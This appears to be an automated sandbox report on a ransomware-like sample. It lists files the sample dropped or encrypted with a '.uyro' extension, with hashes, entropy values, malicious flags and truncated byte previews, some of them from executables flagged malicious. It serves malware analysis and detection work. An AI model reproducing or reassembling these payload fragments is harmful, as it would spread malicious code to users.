C:\Users\user\Favorites\Youtube.url

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	446
Entropy (8bit):	7.497446917070132
Encrypted:	false
SSDEEP:	12:/qhhcVyFtLYN6sDNUkyy1x05Xq3BNRtcii9a:ShhcssLUkymiOBNTbD
MD5:	DFE00BC3AC7C8B26E98F58839C652ADC
SHA1:	15AE3FB9454490D5BE005ED4E2A6F6FA0A0A0723
SHA-256:	4EE99E5818ACF67A9A62A01F8E333DC4440C382A2B5A87E9F4115C954778E808
SHA-512:	1F909C51794013C790CF6848E6D99989DB86F64C61A0F6C3ED90DE0F8958C01F87BDAE7661F76A1F6E72101B963763A6F0E79061D4ADC3D6750155ECF2C77A7E
Malicious:	false
Reputation:	unknown
Preview:	[{000.:.7S.."O.1..]..s.XDG.....M..D...<j.#./../.5f.Uc.........[m.>yF...:.ZF.f.[..,........'Y..L>.{\.2..-...."..7hE...[.....s..s...s....w.%ynQ......4..r..m...!).2.k.$...(..y.>~W..y..%;q!L......&.....}...d.b....*.........d.H...M.l#.......m.-7:.t...%.....sH..jk....6..P....X...~..d.kk...f..........^..%.......`.S.Q....G...zGpLe....s."....S..EK6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Youtube.url.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	446
Entropy (8bit):	7.497446917070132
Encrypted:	false
SSDEEP:	12:/qhhcVyFtLYN6sDNUkyy1x05Xq3BNRtcii9a:ShhcssLUkymiOBNTbD
MD5:	DFE00BC3AC7C8B26E98F58839C652ADC
SHA1:	15AE3FB9454490D5BE005ED4E2A6F6FA0A0A0723
SHA-256:	4EE99E5818ACF67A9A62A01F8E333DC4440C382A2B5A87E9F4115C954778E808
SHA-512:	1F909C51794013C790CF6848E6D99989DB86F64C61A0F6C3ED90DE0F8958C01F87BDAE7661F76A1F6E72101B963763A6F0E79061D4ADC3D6750155ECF2C77A7E
Malicious:	false
Reputation:	unknown
Preview:	[{000.:.7S.."O.1..]..s.XDG.....M..D...<j.#./../.5f.Uc.........[m.>yF...:.ZF.f.[..,........'Y..L>.{\.2..-...."..7hE...[.....s..s...s....w.%ynQ......4..r..m...!).2.k.$...(..y.>~W..y..%;q!L......&.....}...d.b....*.........d.H...M.l#.......m.-7:.t...%.....sH..jk....6..P....X...~..d.kk...f..........^..%.......`.S.Q....G...zGpLe....s."....S..EK6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Local Settings\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build3.exe.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	10062
Entropy (8bit):	7.984005486813951
Encrypted:	false
SSDEEP:	192:V9m073yH7khKup9kt2c7qLmPsCU5hHxmJykUEii26iLH5/:V407ClMFzh5BIJyR1j5/
MD5:	3A101335FA444CEA59A97CF434AE57D9
SHA1:	07828E3E75F853D54EF9BB67A429DE41A6BBA13B
SHA-256:	0E1326746EAEA1C2FA3990FB83F5B0974E5AC457321F3728CA5E6C8A8E98ECAB
SHA-512:	9F2EAFF8137C034D5B2F95A00EC48EB6FF24F1DFB490AA75DAFB32310648CA1603286F3478795CCAEFC729CC84B840568E0861C94B42B6CA75AAA020B9FE9E11
Malicious:	true
Reputation:	unknown
Preview:	MZ...OA........-...g.O.q..9$.@4f...E"..0..AH....v..s.......P`w1.x'.Q....p.}u(=N.y.)4..tj=..\..3khaA..S.+..c....d.......2?1...@_8.1......'.....Di.....8...O.....%# /...73.q...:..p:.R3...\.'.P.,'.x.qy.8U.l..Yc..&....\|...."p.M....6?B.#9.ES1...0...O.?...$.%m..kn.p.,...nZF.-3..t.kkd..,e\...\...v.E...}i..c:...i...C.(....pxY.a.m.."..\|..2Bo../)M).y.J./.Ax...$..a.T]}...0q.IXr.n..Ag..'.X......[.?...T.G..H.m{M]{...e7("gD..D....%....M.."wM.$.TD.-S.HV}..y+_4s.....;...z...z.hb[.fG.vH...d.}....A.p.u<.D.C.#L..=6.K.m.?%X$.?.!&p`@..M..R1.S5..~.$.L{NFj.~~).<6g....[.Z..~..R..>._.0`A.Hx....<....4g..H......u8...3F.<...F.....3..>.....I....H..k.`.f-.......(.U..:..!.....dg.=-!.....j..F...%z..%...C.P..BV....eF.T.]!.q\|.>(..._;v.G.m.x..-../9.{.W2..w.a...sG..e..$"..jb..h.l.......(.<..Nr......'0ipfda.....f..zk..\|.L.k.....a.T........5..th.......$q@..:.../..O.9..}...\.+......cX..8Y.E...G$.Q........&\|. Ta}..e...?.....Y.O.-.I....~...\[..dXL/........s.....{...}.{..*.......

C:\Users\user\Local Settings\Adobe\Acrobat\DC\AdobeCMapFnt19.lst.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	1369
Entropy (8bit):	7.863573339496023
Encrypted:	false
SSDEEP:	24:VLbeYA4DODXARa+TnM/6MJjMeChPB+SXA+ixLHdhUDj857n2+9TSibD:VuJ4DODXARa+Tno6cjMe2cSXFixYe7nn
MD5:	E837F9AF72A9F997C231D71514E4B137
SHA1:	E6B40E013D7A115BDCDB653C7A7D4C5519A1B3A5
SHA-256:	82FFF461C64E101A2D749968BBF95E2F2072C697DADF1F57FF429208A31A57DE
SHA-512:	4E22F42CA238D5CD0E77E741F6F7BBEB33EA0FBB79A4A26EF2ECC26D7B08C9C436C34EF47559139AD8AA038942F82FDADD87D4A6F4CD478B2ABBA8AF192A717A
Malicious:	false
Reputation:	unknown
Preview:	%!Ado...S.]mD.h5...Qwc.zB.[.........;.6.!..nf4..(5..s."....v...W..<..xU...XQ.(......J..b.X.Rg?..".....(...."h..I..h.....F.....L....<\ T...Pea.........,f_.....2v(/.Ob_ .N....I.n...$.f.....N....\|..}...(.(..g...=.]......Y.....&...y...8...U..........D9.R23...c.ljY4.SV..>.....vV.I...d...g04....v.....^.o...ud.... ...a.Yg.Gv<..........3.s..3 ..THY.~.f.O6.&.}L.l..M.....{...O..p...q.b.M.....=.v...G..N.vY.z...$.:p.[.smgl....Z.1k....:@.=.R..r.../.BBZHt.g+.'86!.cKN.)..\|.."w..QUr..4r.l...Wb-<.;.d3.j.2....8n..@.=......1...mBYf...r0{.Yh.x...V.-.w!..ig....P....3.L....t..En......I.Fr.....n.0..<c..B...r....'.....ri.h.....5......~.....NX.:...C...q.D.M.\..6...^.~..^....s.=....#...}u..<..7....G+>...I...\|.O....a"p.........Z.....6.Wp.*.{\|.\|u.\.....)am..Q.iFNk.-.W7..:........hZ.c[......R.N.q....T..2f.J%49...c.9.....K..e.m...m......n#...{S.b...M.<..t...).3!..r&B.vS.r...W.?.@....O..]<:N..8.G;....5.m.4...#.R...2.W...D.6.j.7.....W..3)v....A..x.Q...-l_K..7DF\

C:\Users\user\Local Settings\Adobe\Acrobat\DC\AdobeSysFnt19.lst.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	80722
Entropy (8bit):	7.9980796222227974
Encrypted:	true
SSDEEP:	1536:clFKoAPYZVLFonlb5TwBeLTjBy4TxNvJic7dx8WJ4tTjJTyWlyEY:2APYXBzGjB70Q8dJyWcL
MD5:	CBD4463D49BD83DC35F969FEB02B6D97
SHA1:	2BF9EA7EBFA774F63CA54E9CDF1D003878ECBD32
SHA-256:	2B7095CA74E695B564A04875FC74CD590B078AFB89E7806C2F9700976E458364
SHA-512:	80A89F75374FAD67846ECDFE12FFCC86969F8310D9337B063399CD2356DBF430A543D20F3CE0987333D0B082B30DDE416597969A0D7DA4F34AC83F0AD1DA0BD2
Malicious:	true
Reputation:	unknown
Preview:	%!AdoT..N..j.,..\|..(..X.1...r3y.(.&..kWZ.!.....x......?..J......4u4;......F......-'...K.#..FyP.....1....:."..!....\|f}s....{.O..8......K..H..?5.5].9)5l.Lpt`....;0..r.f.]WT.......T~.&.K4[x....?'..Uo>...K..\R.....}...Y.0u9...P...1b.p.U.....o.P.^..lJ..~.9..y..Ar.e....Z....~$Q..IU...`%..?......5.....V..]...92...~M....Nx..%.9T.s....:..;'PD_i...{.u!..ty..P...H=.O........S..'c.?.....K.~.).......#..&..N9I3.P...i]?...G........]D.g....4y@...J.:..W.h._..@Q..s....<..m.IK3Q.._O....S5....0.l..Kn+.P.7.-.......O. u.;.....vY..X............t..._Q..5d....dg..9.........`...4.o....R._.:B....Mz.....g\|n.X3...X...w..N7A..30.D..P]..{$.t../.....-....-I..t.x.y.N%1.....q.b....R.3.._.p...2.>..3.._..?z....O..h..K/..L5..uA...r...1Q........I.D..gQ.....1........dt,]2..w...,Y...b-.....aW".>G..L.w.:..w..~..]./hr...G..+......z"z1t...2...?../..>x.-.:.(..C.oB.....tlg....Q....\|....c3.w.Sn.....Br..9.fZ..l...<0../...z(.gs..i....*.I.G.`.v....X##+.....}.OU..,...nhl..Lh:.UD0

C:\Users\user\Local Settings\Adobe\Acrobat\DC\IconCacheRdr65536.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	252320
Entropy (8bit):	6.587558359470704
Encrypted:	false
SSDEEP:	3072:r+RmHTgdVjU9UC0Cl9t2k+ngUQUZ/WisHYr7Ah1bT562+WomP4+1:tUdZU93lYvdZuXGkhtT
MD5:	CA8E6F01DFA975EFD791171053E6B9CD
SHA1:	3BD444FD681566D1C24CC9F56930923E0228AF91
SHA-256:	27A55FD7ECB208CC4E6D5D84D2A66CECB88733B6E80C34D3275E1FF6FE1E56C4
SHA-512:	59A69068EF151D779FFBF8AD2D45661C54317A5C10479AA9BC82C046CFBE60CD2B75B5278A7BE01F45031FE6B6C7F068472C083BF08C249E67E814F2146CF7A6
Malicious:	false
Reputation:	unknown
Preview:	Adobe...-...T..A.qO.+Js.7..f..h!.J.LJ.u.T...r.5M.g..w,.G..E.P\.X..C{..G.w.`...t..^p.{x./W[...ff...)....g.....#...r.,9/.<._....:..R..5..p..........&^1......%.. .Lr....U..e#.{.....kI..j..9..+.......6.C.C....^........6....yce.X.?...?j..../.BH.f."....u..NL.AX1.C..]..3..].3...".C..{d...C<g..C.uO.B.:......A...`.!.........O....~.l..).x\a~<v\.gd.W).>x....H}....i.$%.}....~.7.....!dM\|.A..5...:...^.F..'.'....<...C].KY..4.N\|[.O._..".G.s.\|.o)..z.qM.g.{.....Z.=.T:`..d......Yf[....QM\|..5V...U...DY.5Y.G.;-{..u0U!.L.Z.$..8!.M..6Y_.m....am.is.E^h...L.....I.q.w....1Ue1....H..q2xM...C...0q....0j..o(Q.........'.x.m..m.......Q.\...C...Ij..g{t..-A....ph..#......M.....*.,$...".[..&.46q.[........x...\..s...g....<.p..^..6.\.jN...2.....8...I....M.%u.c.9i...,..`$F.....&{.7...X..J....rTl.(.v..8e;m.Ya..WP.....,.y.23}.]..5.d^?..0...}.bm....r?1Q"...l.....4....9.2.......m.......@...Q.q......3p.s...l.r.....[....X.&%....@....I..:.~b{.=c.K8..`v. x..{.....?...3D.S...

C:\Users\user\Local Settings\Adobe\Acrobat\DC\UserCache.bin.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	32987
Entropy (8bit):	7.995165560800251
Encrypted:	true
SSDEEP:	768:l25ATIw57s956c9CRUeS3w+dzM+HfGfXaCFo+SB6xRbehYIq4/:l25nw57s956c8RUBzzM+/QXaCFo+91/E
MD5:	1C141C9FC705D03D9AD7B1ABC47332EB
SHA1:	8AD396FA56EFAA83B088FA8859B65CACB143C7DC
SHA-256:	887922E064A1A14AC29F1547AD8E6505BB40D45620FA6B7A7EAFAB85505DEA27
SHA-512:	2FAECAF5A172EE72C6F58E18C0FF73FA85E80686B25865F0588C34AEF3B628A1B892E72FE86B46CE7C87E1747BF1522053AB11A9CEC3E19FED17D0E80E4D1B29
Malicious:	true
Reputation:	unknown
Preview:	4.191si..L..z...~....Q{.."f..,...):..&...-J.K.W.......b....s..(>l...#~..G.......>.t;v.)...c}!J"(..{E+B...D.8..n.{.39..@C. ...F9..9..=...X....."...q3.7... C5..~..... u7....^..'W.._...._..>Q...)r....r.....a..r...2.qh ....h.........Q.bT....I.."..p..{H..}q.%.g.q9.[Ymd.5.Y.\|v.P.U.?.>I....'......`.K+?-.P.. .b}N..2....o...._.}. .7;h"0(...7}v7.E..r... .M..M"....4;.....Ij.\|.....[Gh..N..n..c.....G..S.d.dK.......EK.Z.;..^E.o..&.. E.s._P6p`...o..f?:}.....U..:n..40.$q.o[).@,.....s..;.~v..g...R...&.x.T.E$...8.-T......kH.z^.....Mb...:.Lq..K=.Ad...qQ.......vrS...p.3Z......}TS..yc...L@.b.....W.n..n.*........}........I...C>H.l..Ew#..jV..,...^a\L.n.gX.a.tw\..:.P.QY`...._....jV.0.%@........O...MT5.<.../.R.5..jQ.\|.?.Z....f.Fr. .)-....xL...vi....F..1.E.d.c.h..Ky......+ .=..[.u...n6(...u..9..d.....)...`.s......?10...-..Wo%...$........O.x..........j......e.CYy...........25....f......@b...L....,Z.X..3.y..w....Z.Ge.2<.v..$i)3...O#&......6.\|....qR\...w{.....

C:\Users\user\Local Settings\Adobe\Color\ACECache11.lst.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	932
Entropy (8bit):	7.7630039517608225
Encrypted:	false
SSDEEP:	24:UTJRiKsDQvm43faBHl5mqt8S3CRW8qia5hRVyKLbD:UpsDQx3faBH33FD
MD5:	7A2A13EBF6E38A9D3777C4B8BDBD9C09
SHA1:	5BAB8BD2AF64DB9B222999EFDF701622EA8AD705
SHA-256:	B1AC86C34F254AFD6F0D8CE83F929680E99D54C33BB26F2EB08877A985A6D93B
SHA-512:	BC51B7A336319C02D6A0C321C91DFC51C8D1E8207A7F8D88959CE43611B0E74C515B32495F7C9DDA20FEAE87FFB146FF35D9DE818041AC4EF632BC0F0AC014F0
Malicious:	false
Reputation:	unknown
Preview:	CPSA......$.......6...Ua1..$u...-......^.;..... .Q..Xy..7...(.(..P;..!...2c=.._...;..bI..'".v.P.?..i.}...7.p..k.iCbk2.....H..y....MU..H.YI.B.).aR..,...&L...`K.p5.I],qI.4. .i)^k.'.+..uch.f.%......vPd..j4.A.....K._?F6.5.R..NP.....,{x....pw`pe......._...'...x...C.....N(..IW.=...JsO.N..b..O..s\m..K.D.!i..4..B/y.%.t.j......r..~.t..g........;.....k.e...C\|-JF......'..<...%.....i:^P8.f...5.yO..-..S...f....Tp.IvV}.A7.b..k3....S_......E=.O..<_.\d.g........M,.e.o._.-....JI.7......Qd)f....W.z..(...o....'....8.y.).S ..&P...x..........o.4`..n}.gu......f..#...:Q.VM.j0..d2.l.EOp0\|1.....X.i[.B..SP.. ..(e.A...;..T...N..}..c...W.tAm.`.a.-Co\|~.9...,^t........p...'......eA?i.RC...@.......z...v...dF.....?.D...D..)1....N.\|..D.t.-"...$f,1..%u.p.\|.N..P.j<.Nib..4..G.{..56.{..pW4Og...Y..W.g.m....W..AZ.s"Xo....U8L...L......3...\.."K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Local Settings\Application Data\Application Data\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable, MZ for MS-DOS
Category:	dropped
Size (bytes):	680782
Entropy (8bit):	7.986526926520813
Encrypted:	false
SSDEEP:	12288:EEmMtgZhgT9uMA9F8GJF6y9NbgGUx0kXZPwtSRGG/t6i5l5kCYlSV:NmMtScu93d9V3U/XZPwYRGQ6i5l5k5lE
MD5:	E9FE84B69073056ECAC6B24F92F6F06B
SHA1:	7C015C421C888F822EBD97E41EC4FC0C9FFEDAFA
SHA-256:	494AC478C50EF9CBC55ED6C7D324CE84AE63FBF0809825C58C17BE91D4078CEC
SHA-512:	1FBEA24E99F888BE972110079B2F00A32E8D54F57D477B79C8E3500A1999923AA524EA5F7802EC525EB1C97BBE554D1F2EEA75F68C3DA271DC496BC207036F7E
Malicious:	true
Reputation:	unknown
Preview:	MZ...,...zz]..1..8@ .....d}(z.#}.e..N?cn.s.~.$.Y...=.K_...N...I...x..l.8@.^W...M...(.W.;8..i..O.h...~...'...O=i..;vgC....Io..[7..sN.O.T}.B..X.._...\|V..A....(.A..l].....o..S...s..0l.3.~.N....b.M....E.q.k.d.R..P......I.......(?.+u...............!..;.%..Ov.......r.......;Q.o....-^.Vs..l.....g.W....q...;.b..T.3:....9...U.`.[....m.T.8.j..t......U.....mUrW,.P@.>..^...=R#.>.9D.+=.Z.].rQ.7.X./.............."D'.A..Pv^.yrb...y.D...-P.,/7....=P.f..;.G..V&...<<c_.UH._...)F..r.+.p.3.....Q.c..].I...j.&?OO...U.lj+.e...z....]q........mx.DVOM..:dG.}s.9.......m....4.p.-%...5.~.&..VQP_.n.[...v..@(.:c~]i..d......7....%."......cl._........$l.G...!^.ta...H.?.)..:jS<._z.8)R....E....DZ&.R.z.PJWE3d..i.]...*,.GZYLv[...(.C...k(66....V...g}.;U&..&.g......p..?T.^.Y....I.[.$...I...Y..I.......a....b..2...IQ..E.w..N.vv..)..LN(.{...y.../.)~..v...b.g _..?..0.YyAoR.JJR..G... .Dn.w..I..a.V...W<...l..j...S...:G.N..M.k..h...)..)...]...t.[..1.=..b.I....V5.G...KE}K......4f..

C:\Users\user\Local Settings\Comms\UnistoreDB\USS.jcp.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.98112083835023
Encrypted:	false
SSDEEP:	192:ycwhlZ94azNbRvjufiSXC5K6OVLdGjasC5sdM8GPB7pASvt:yc2ZmaDSZXddGyuYPB7R
MD5:	D9E8248DCCEC145A2180F79C7440D756
SHA1:	29916A837D707F6944A292D71F256D16693305EB
SHA-256:	CF0B9EE72CC7CDBC877BCD4D13052D0E610A5D6AE9911FEF23614CAEA5EFD1D1
SHA-512:	4981E6966AD07489868C438A257EF6443A4D5863D7AD2447EA50FF90DEE234B7ADC04C12ED6305CF981AFF197AFEC74291F92C36FF2F964DAC0D1279B75F6E9D
Malicious:	false
Reputation:	unknown
Preview:	.......Fh.f_\|^.........3.T.+.......m............^.O.>.M?.QC....1.8.lS.2.}.aU{c%!]d..`....s6....R.5..@.B.3.(sP'hHH..s.:.J..J.-U.\.....1.....ej....8.x...fc....41...P...M[0.....#.Rx..y....f\..\>.0..8......K.3...X.....Dm..s.....9k.....o..%V.V..{.bs9...r..,i:..#[......T.3......v..%@.Z..,^.."...i..&0.A.x+.`...oK...4..mZ!....N..Ny..V9B..u...7.@.".&\.7SUh&...W.`x6.c...M.O~I........h99..(....X.h.d#..%..d....6.jD%...C{.....=j$...J._..m...)...D:..K.^..6......Nz%...Q...c..m..>e{( 6.....I.2..G...t......Zq..dv@..^..#.....z;.\tN....G8o.3<.mE.T.2.A.w.)..`.W..z8...d..+%.......L..X>...+.....<x...2!..9...m7.........d=c@..1~U.i...l..<.B....O......w..a..Rk<...........Y.h.$v,...s...@x.n.......%y9..{.....Y3...b.......gn...5.v!R.do.f8.>".d.Q......p..j_....0.....t.Dg..m.....;.E.^...`Q..Z....@.\.d.....q.F?. HvO..Y.'..@..<.. .t.,9.V....-xM5.k. ....v.....................h8z.....*M0.n......:....+.........Q,.8`$8F.g.-z!..c.Mg....d....d.2.`..+ ....,..@. <..@..~. ..,.

C:\Users\user\Local Settings\Comms\UnistoreDB\USSres00001.jrs.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	3146062
Entropy (8bit):	0.6705843286483366
Encrypted:	false
SSDEEP:	3072:80ud0YPeiQj5+1wl/OJPjnEVhWsyiH1DLaFahA0AnvzKDSNpnjlcig:u0KQj5+6APjEuspGAhjAnZFjSV
MD5:	47FD992FBCF903331FC866FDC10427E9
SHA1:	152108012A2D415773EABAAC5290EDD69B932BE3
SHA-256:	EAC957E5C09CFA9230F958C731FBC47BD4BCC9EAB3C1F0185A3A53FC65D7E335
SHA-512:	EA5F8103A2977DFB22B376942B2FAA0A78B1053E6D0957102A4EAAA0CBE14DBD1D3C4AFC9B8ECE991A2B30C4C85336149FBC194795B4142886FCAD5AFE6477F1
Malicious:	false
Reputation:	unknown
Preview:	.......t..gGBIC..#...o...g.8{...,..O..`........ t..C.....=.}7..P`....Z.G..E...=Ps.i.;........a.o..N...(.B_]!J...O....Byef.+S\|g........t.k..f...Ze.......KG.....G.......a.:.Y~..j4T....)...T.K.P...0....M_...j.?...\|....k..e.UE8..v.23../8.K....O..P..+..].%.......0(/..w..=w.e...3......%..Y..6J....b+UC.,."...._?>...n.nc&J`.Ju.^.q...4..r....].>........z{..=[..#L.....\|.n...$oJe....T..7iO..We..NU;8.J.Z.i2y$]...z....Pt.N....^...oy........g...P...."...]..^u.#`{I..k..'+GF.C..E$.0.n..W+....XX+.#.;.........n.......h.b.x..1/..D.qq...xPd....j-!..u.$r.YV........fXz.}..q....Z:.....{r}.....8o..f....yT Wa.u.i...._\|.....;.H..EEY..[.U....T~]..N.d~=..%.mMp.;.e.j.I3I.A...u.f.e...v.%.y"Nm.F.G(I....&.N........K....R?Y<..70.p....A...X.z.x..b%.U..\.QL)O.'..n..k...........x....!}...V4...]....^.n.:,.......y.....7..jI..c....c....M.qq,.Q..G!...[1Tc.?./....r9.;m...-/.:0D,...F'..h..9...9......R....l............A.....?....uDw.T.....[..L....F....E...@-...^

C:\Users\user\Local Settings\Comms\UnistoreDB\USSres00002.jrs.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	3146062
Entropy (8bit):	0.6705734697462741
Encrypted:	false
SSDEEP:	6144:G5GZp4pR9jRkYhiQG3lPcsw0oRweN39aww:eGT49jRkYgXOsk2u39av
MD5:	BCA3E15713F3FEDF8CF75B5795662AFF
SHA1:	D2396F399D600CAAD14F1F28BCB79F661E99A891
SHA-256:	4E066D20B625C274ADC9E6FBD42B65E57B8698D031C1996FC135E5A15ACE14E1
SHA-512:	11D97AE7D65FE8960525442CEA47A8E666A504914969FDDFC8E158111BD3EFD58F15DBA80FE16E6AA4700793D20166B38F87053DB643FC4290389CA32218B444
Malicious:	false
Reputation:	unknown
Preview:	........z.k.j.......<.r..p..NY...D..}-.2........y.Z...k...l.p.U....?t.....0.e..#....]T2X.d.)h....._$5...x....S.CCuPk...V...........B@.n..P.o....(.w..G.q......N2.m_R...............8.h..F!...d..2......y..0../.=B@.0.SI...8a...Y.B....i^Cj.b....n.....I....O..8.~.$.a....2J@F.....-n2.~.1....MH..H.5..@t..NM...61iI.A......_.)tX.....0e8<..g.c...N..w...NL.....$.r......6..Q...].N,=.......Z.&....qr...........nD.2..R../Qt...i,...\..{..'.)...X.......Y.\|.......j-f......p5Q..;......^./..C.y.>9....+WJe.W....[A..\|tz5..ZS4.n..h...E.R../.4&8w.^.6..E3...$......h.p....v3Z...PS.Z.J..6o..M].F$\....~"I....y.v.....m.....v.s...p.<....^."...[:.../...hUbo...G.}..%x....^.%.kn....Vd#....T.....n...M.d.q2.N..=_...#(.^..I=.i..).IWttPa......E..pL.....C!.....sb..d.aLP.(... .......n.W....!....r5P+....qXt-B. 5d.e..%;w...D`Be.%V:.k.I*.e.0.`..1H..c.M.(.&9.d....3Zc....x..i$..v@e...}.L...l.g3.>.Z.8.r.8R].}.%.../.../Tn....2...t.5Y...h.b.....~7/L(.m.....8f.[.4.^..z]-....'..

C:\Users\user\Local Settings\Comms\UnistoreDB\USStmp.jtx.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	3146062
Entropy (8bit):	0.6705361118460252
Encrypted:	false
SSDEEP:	3072:O4wC+rpz8dVo7lHShnZHWu92H3VEsEUK8wKGx:O4wC+rpAnqgGH3O7UlI
MD5:	C8901987DDA10AFF5F57E2B80E61BEFA
SHA1:	AF31791EF53C0F30CA0BC5B54A4FD6DA599AEA4F
SHA-256:	6740F5CACC786F9C3BAD979E3CAD476819BA119E7B3A2619D2CB56976B8EDBE0
SHA-512:	B782AD75ACB908800C3D27579CDD958FF89CEE970E6E2F5ECADBC1A9605BC9F32FA93132839A3ABD0102B2AEA5874759C08C12F3E405BDCD4E7E1400D4653449
Malicious:	false
Reputation:	unknown
Preview:	.......{...XA..>F\|a.!n.\|..'_a,.L....<.....2..f...<....Xp]..8.J.........a..;._..Jbj.L...\...w6+....C..$[y.qb4.....N..\Hi....q....7.vwk.T...)..HQ..p`N.........sjh.,5.B...-#...&Rh.+...;.]s7Q....Y..c.f....%.$...6..b,..B:..2...)..*....)t.D..^.f......u../._6...g.'...H^~....>....l.h.@p..Jx.=.k.%...~2...zr.1..^yDY.....!/.G..,\d.R.&H........L,...C.....>h....wK..q\$.DTc.....R....`)..w........K5QS...6=.BY..#.N@V..4.........@.....@i.....VU.....R;......+".'.I.e).v=....F...t./...R.r.y..e3........[V.j..,.c.k.e.;e...]jD+u.....?.9.Pe....E...I.T-.M.e.:..[.4..>.../.8..'..E...8w......$.f....Y..Y..i.../.c..x.w.}%./...$..7..{.....dr....lQ;y...(..U...k+.QMgB.x.~t.9Rsg.3.M..?......v.+!.w...Z...k......D..=yM4.....w.@.../.y..C...lE.$....g.D.%Ml\/NL6...I+.K.j.....7...{j+d....C..`....@.n...[.G+.T..+..l..$......(F.R3.m.y.d.3-l...)...\|...Vm?(...../4Y<{..H!..+.wr...U%D ?.>....3..g9.]Q..:..:........l.....7...x@.6...h ....]..xp.M.P..q.D-...?.".P..D2.dCV.R.;

C:\Users\user\Local Settings\ConnectedDevicesPlatform\CDPGlobalSettings.cdp.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	2323
Entropy (8bit):	7.910646689508133
Encrypted:	false
SSDEEP:	24:oqnGB0wL2yPGIIp0FiJCIhxN1DoiTsueME43ApH4pn+kXeig6aTnny8z4i03I35C:9k0WeYasYp+QxgdD4i0wicqqheBZD
MD5:	67F53C37E670F036AC5117516F249441
SHA1:	70830E9B3F1E17219BFA77CC451BF4A3632A0EE1
SHA-256:	1F6CF0BBEC0EC622854A2D77715C06EB6F9FE0B99695013BF5CA27BAA9976AB1
SHA-512:	A264816D46BBEBDAFDF494DAEBE4582BFCB0AD1C0E9E07639D6ED5389F499537DC0FEE2D4338FF945E96CD8AA528E7AF3A97EF640C7CF052F5F69CBD17738F8B
Malicious:	false
Reputation:	unknown
Preview:	.{.>.......-'.Z.<I..[.............m..)+...0C.~4..+......s...%...q.7.....i..H.d.....PN=X'.C....G..E6..2.+.!.....}j.n...2.pa.H..i.....\|....+.....-d.........7..".w.s..T.lh...Ai...u...x.......UA.;.....yV>m.....:.{.x8.B7.-..@.+'.&.......K......'..7...~&.w........0=.#....2G".....>.D<.1...{wDg...R...U..tv...aV]......m........-2...@.J..-.c......D=.p...m...-..U.W.s.i.,Y...w....G..'..>.Y4..Ys...K...R6..?^..[..}.rq[-........;..1..G...m...EY.u+....0......&...}N..........(].B.W.[..F.C.Rg.Dv<F..Q[QK.K?./.:.@.(m.S x...z..m...q..q....)Pf/.j.{.d.}..C.;.].>.......:J.>...D"X..Ma..M...5w3.kqwk..{.Q^A..{.JA'...#.-.8...x....e.%..E.?.v.......g.....0...a.5V.p...?{.h......k....7.'a......M.Bz. .......j.C7I.?..Kh..e&..k.y...x.-.c.,3Luq........V..j..U^.K.x$.Ppx.u.{.....<.y..lC~~..8..p.H...N..e.n.CT0..@..b...e....8.......4....`K"*d~...........E.....n..:D.`..u..k.3I.....Js#."...........y..d.S..O...Ju.&rW...Nv.H4...N...R.8.[....9e$M....+..M.K..\|.RK....

C:\Users\user\Local Settings\Google\Chrome\User Data\CrashpadMetrics-active.pma.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1048910
Entropy (8bit):	1.7685960927841093
Encrypted:	false
SSDEEP:	6144:58jsVU401ZHF4hFgIoDBUV25fT8VZO/Jkre:ejsV8zl4hFg1a2BcO/Jkre
MD5:	6CFF0E55062F4F7638762AB89A00F830
SHA1:	020262E42EFF5BF456BE03756A5EE6BF759CB451
SHA-256:	F932D64DE7BFA805C6D9B7EF3A01BC6293AA2ED2D49503DBD25BE641074443F1
SHA-512:	CB576CFE9E0FDDF87665321C9993445C9B271F9108F9869B9A21BE643976A6AC4AD8ABCEA64064E41C8432EFBB2225141009254963F0CA2EB2157D20077AB311
Malicious:	false
Reputation:	unknown
